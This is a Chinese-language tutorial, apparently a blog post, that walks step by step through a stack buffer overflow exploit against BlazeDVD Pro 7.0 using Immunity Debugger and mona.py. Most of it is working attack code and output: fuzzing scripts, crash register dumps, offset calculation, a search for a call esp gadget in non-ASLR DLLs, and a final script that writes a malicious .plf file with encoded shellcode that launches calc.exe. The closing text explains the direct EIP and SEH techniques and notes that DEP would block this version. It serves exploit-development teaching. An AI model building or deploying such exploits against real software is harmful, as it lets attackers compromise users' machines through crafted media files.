缓冲区溢出漏洞实战（1）

目标软件：BlazeDVD Pro　　

版本号：7.0.0.0

系统：Windows xp,Win7,Win8

——————

主要是Immunity Debugger mona.py插件的使用，此插件是Corelan Team的精品。设置mona.py工作路径：

!mona config -set workingfolder c:\logs\%p

生成测试数据：

#!/usr/bin/python
from struct import pack
 
buffer = ‘\x41‘*1000
try:
  out_file = open("001.plf",‘w‘)
  out_file.write(buffer)
  out_file.close()
  print("[*] Malicious plf file created successfully")
except:
  print "[!] Error creating file"

程序崩溃时寄存器状态：

EAX 00000001
ECX 0B63E100
EDX 00000042
EBX 77F4C1AC SHLWAPI.PathFindFileNameA
ESP 0012EFBC ASCII "AAAAAAAAAAAAA...
EBP 00F21E60
ESI 00F21CF0
EDI 6405569C MediaPla.6405569C
EIP 41414141
C 0 ES 0023 32bit 0(FFFFFFFF)
P 0 CS 001B 32bit 0(FFFFFFFF)
A 0 SS 0023 32bit 0(FFFFFFFF)
Z 0 DS 0023 32bit 0(FFFFFFFF)
S 0 FS 003B 32bit 7FFDF000(FFF)
T 0 GS 0000 NULL
D 0
O 0 LastErr ERROR_SUCCESS (00000000)
EFL 00010202 (NO,NB,NE,A,NS,PO,GE,G)
ST0 empty +NaN
ST1 empty
ST2 empty
ST3 empty
ST4 empty
ST5 empty
ST6 empty
ST7 empty
3 2 1 0 E S P U O Z D I
FST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT)
FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1

EIP被覆盖，同时ESP指向目标字符串‘AAA...‘，计算EIP和ESP指向内容的偏移：

!mona pc 1000

构造新的测试数据：

#!/usr/bin/python
from struct import pack
 
buffer = ‘Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B‘
try:
  out_file = open("002.plf",‘w‘)
  out_file.write(buffer)
  out_file.close()
  print("[*] Malicious plf file created successfully")
except:
  print "[!] Error creating file"

程序崩溃时寄存器状态：

EAX 00000001
ECX 0B50E100
EDX 00000042
EBX 77F4C1AC SHLWAPI.PathFindFileNameA
ESP 0012EFBC ASCII "j3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3...
EBP 00ED1E60
ESI 00ED1CF0
EDI 6405569C MediaPla.6405569C
EIP 37694136
C 0 ES 0023 32bit 0(FFFFFFFF)
P 0 CS 001B 32bit 0(FFFFFFFF)
A 0 SS 0023 32bit 0(FFFFFFFF)
Z 0 DS 0023 32bit 0(FFFFFFFF)
S 0 FS 003B 32bit 7FFDD000(FFF)
T 0 GS 0000 NULL
D 0
O 0 LastErr ERROR_SUCCESS (00000000)
EFL 00010202 (NO,NB,NE,A,NS,PO,GE,G)
ST0 empty
ST1 empty
ST2 empty
ST3 empty
ST4 empty
ST5 empty
ST6 empty
ST7 empty
3 2 1 0 E S P U O Z D I
FST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT)
FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1

!mona po 37694136

37694136 [19:55:22] Access violation when executing [37694136]
0BADF00D Looking for 6Ai7 in pattern of 500000 bytes
0BADF00D - Pattern 6Ai7 (0x37694136) found in cyclic pattern at position 260
0BADF00D Looking for 6Ai7 in pattern of 500000 bytes
0BADF00D Looking for 7iA6 in pattern of 500000 bytes
0BADF00D - Pattern 7iA6 not found in cyclic pattern (uppercase)
0BADF00D Looking for 6Ai7 in pattern of 500000 bytes
0BADF00D Looking for 7iA6 in pattern of 500000 bytes
0BADF00D - Pattern 7iA6 not found in cyclic pattern (lowercase)
0BADF00D
[+] This mona.py action took 0:00:00.609000

!mona po j3Aj

- Pattern j3Aj found in cyclic pattern at position 280

查看所有未使用SafeSEH和ASLR编译的非系统模块（绕过SafeSEH和ASLR）：

!mona jmp -r esp -cm safeseh,aslr

0x60350cc3 : call esp | {PAGE_EXECUTE_READWRITE} [Configuration.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.2.5.2007 (C:\Program Files\BlazeVideo\BlazeDVD7 Professional\Configuration.dll)
0x61658beb : call esp | {PAGE_EXECUTE_READWRITE} [EPG.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.12.21.2006 (C:\Program Files\BlazeVideo\BlazeDVD7 Professional\EPG.dll)
0x6405e463 : call esp | {PAGE_EXECUTE_READWRITE} [MediaPlayerCtrl.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.0.0.2 (C:\Program Files\BlazeVideo\BlazeDVD7 Professional\MediaPlayerCtrl.dll)
0x6405e5cb : call esp | {PAGE_EXECUTE_READWRITE} [MediaPlayerCtrl.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.0.0.2 (C:\Program Files\BlazeVideo\BlazeDVD7 Professional\MediaPlayerCtrl.dll)
0x6405ef83 : call esp | {PAGE_EXECUTE_READWRITE} [MediaPlayerCtrl.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.0.0.2 (C:\Program Files\BlazeVideo\BlazeDVD7 Professional\MediaPlayerCtrl.dll)
0x6405f7a3 : call esp | {PAGE_EXECUTE_READWRITE} [MediaPlayerCtrl.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.0.0.2 (C:\Program Files\BlazeVideo\BlazeDVD7 Professional\MediaPlayerCtrl.dll)
0x6405ffd3 : call esp | {PAGE_EXECUTE_READWRITE} [MediaPlayerCtrl.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.0.0.2 (C:\Program Files\BlazeVideo\BlazeDVD7 Professional\MediaPlayerCtrl.dll)
0x6411a28b : call esp | {PAGE_EXECUTE_READWRITE} [NetReg.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.12.11.2006 (C:\Program Files\BlazeVideo\BlazeDVD7 Professional\NetReg.dll)

编写最终POC：

#!/usr/bin/python
from struct import pack
 
junk = ‘\x41‘*260
eip = pack("<I", 0x60350cc3)
nops = ‘\x90‘*30　　#ESP指向偏移280，NOP后移shellcode
# msfpayload windows/exec CMD=calc.exe R |
# msfencode -e x86/alpha_mixed -c 1 -b ‘\x00\x0a\x0d\xff‘
shell=("\xdb\xcd\xd9\x74\x24\xf4\x5f\x57\x59\x49\x49\x49\x49\x49"
        "\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a"
        "\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41"
        "\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42"
        "\x75\x4a\x49\x69\x6c\x6b\x58\x4f\x79\x55\x50\x75\x50\x35"
        "\x50\x33\x50\x4b\x39\x49\x75\x66\x51\x4a\x72\x52\x44\x6e"
        "\x6b\x70\x52\x44\x70\x6e\x6b\x42\x72\x44\x4c\x4c\x4b\x63"
        "\x62\x64\x54\x6e\x6b\x42\x52\x54\x68\x34\x4f\x6c\x77\x63"
        "\x7a\x35\x76\x65\x61\x4b\x4f\x74\x71\x4f\x30\x6c\x6c\x65"
        "\x6c\x71\x71\x53\x4c\x46\x62\x76\x4c\x37\x50\x49\x51\x68"
        "\x4f\x76\x6d\x57\x71\x6b\x77\x7a\x42\x7a\x50\x32\x72\x42"
        "\x77\x4c\x4b\x42\x72\x44\x50\x6c\x4b\x31\x52\x37\x4c\x55"
        "\x51\x7a\x70\x4c\x4b\x33\x70\x62\x58\x4f\x75\x6b\x70\x51"
        "\x64\x52\x6a\x77\x71\x78\x50\x42\x70\x4c\x4b\x52\x68\x47"
        "\x68\x4c\x4b\x46\x38\x37\x50\x77\x71\x5a\x73\x58\x63\x55"
        "\x6c\x53\x79\x4e\x6b\x66\x54\x4c\x4b\x73\x31\x38\x56\x75"
        "\x61\x59\x6f\x36\x51\x59\x50\x4c\x6c\x6a\x61\x4a\x6f\x34"
        "\x4d\x46\x61\x79\x57\x77\x48\x49\x70\x31\x65\x4b\x44\x65"
        "\x53\x43\x4d\x6b\x48\x65\x6b\x53\x4d\x64\x64\x53\x45\x6d"
        "\x32\x73\x68\x6e\x6b\x70\x58\x67\x54\x67\x71\x39\x43\x62"
        "\x46\x6c\x4b\x76\x6c\x42\x6b\x4e\x6b\x62\x78\x45\x4c\x37"
        "\x71\x38\x53\x4c\x4b\x46\x64\x4c\x4b\x45\x51\x48\x50\x4c"
        "\x49\x50\x44\x71\x34\x47\x54\x71\x4b\x31\x4b\x63\x51\x31"
        "\x49\x63\x6a\x70\x51\x69\x6f\x39\x70\x46\x38\x73\x6f\x53"
        "\x6a\x4e\x6b\x56\x72\x58\x6b\x4b\x36\x31\x4d\x42\x4a\x55"
        "\x51\x4c\x4d\x4d\x55\x38\x39\x65\x50\x65\x50\x65\x50\x56"
        "\x30\x62\x48\x75\x61\x4c\x4b\x62\x4f\x4f\x77\x79\x6f\x49"
        "\x45\x6f\x4b\x5a\x50\x6c\x75\x4d\x72\x36\x36\x42\x48\x59"
        "\x36\x4a\x35\x4d\x6d\x6d\x4d\x49\x6f\x49\x45\x45\x6c\x45"
        "\x56\x43\x4c\x76\x6a\x4f\x70\x39\x6b\x4b\x50\x42\x55\x36"
        "\x65\x4d\x6b\x51\x57\x44\x53\x62\x52\x50\x6f\x62\x4a\x77"
        "\x70\x56\x33\x6b\x4f\x4a\x75\x35\x33\x35\x31\x72\x4c\x33"
        "\x53\x74\x6e\x32\x45\x43\x48\x75\x35\x37\x70\x41\x41")
        
poc = junk+eip+nops+shell
try:
  out_file = open("poc.plf",‘w‘)
  out_file.write(poc)
  out_file.close()
  print("[*] Malicious plf file created successfully")
except:
  print "[!] Error creating file"

再次执行:D

此法称Direct EIP Exploitation。

另外如果通过Immunity Debugger的View->SEH chain查看程序异常处理链，

Address      SE handler
0012F104   41414141
41414141   *** CORRUPT ENTRY ***

SE Handler也被覆盖，此程序也可以通过覆盖SEH指针完成Exploitation，Corelan Team也有详细教程，此法称SEH Exploitation。

--------------华丽丽的分割线------------

缓冲区溢出利用的根本原理，就是把我们的代码片段写入目标进程空间，然后通过控制EIP来执行它。可以直接覆盖EIP，或者通过间接方法控制之，Direct EIP和SEH Exploition是最“古老”和最基础的缓冲区利用方法。在此基础之上，才可能去寻求绕过缓冲区溢出防护措施（如微软的/GS,/SafeSEH,ASLR,DEP等）的技术。

如果按照上面操作，很可能不会弹出计算器，而是一个错误提示框，这是因为上面的方法可以绕过SafeSEH/ASLR，却不能绕过DEP。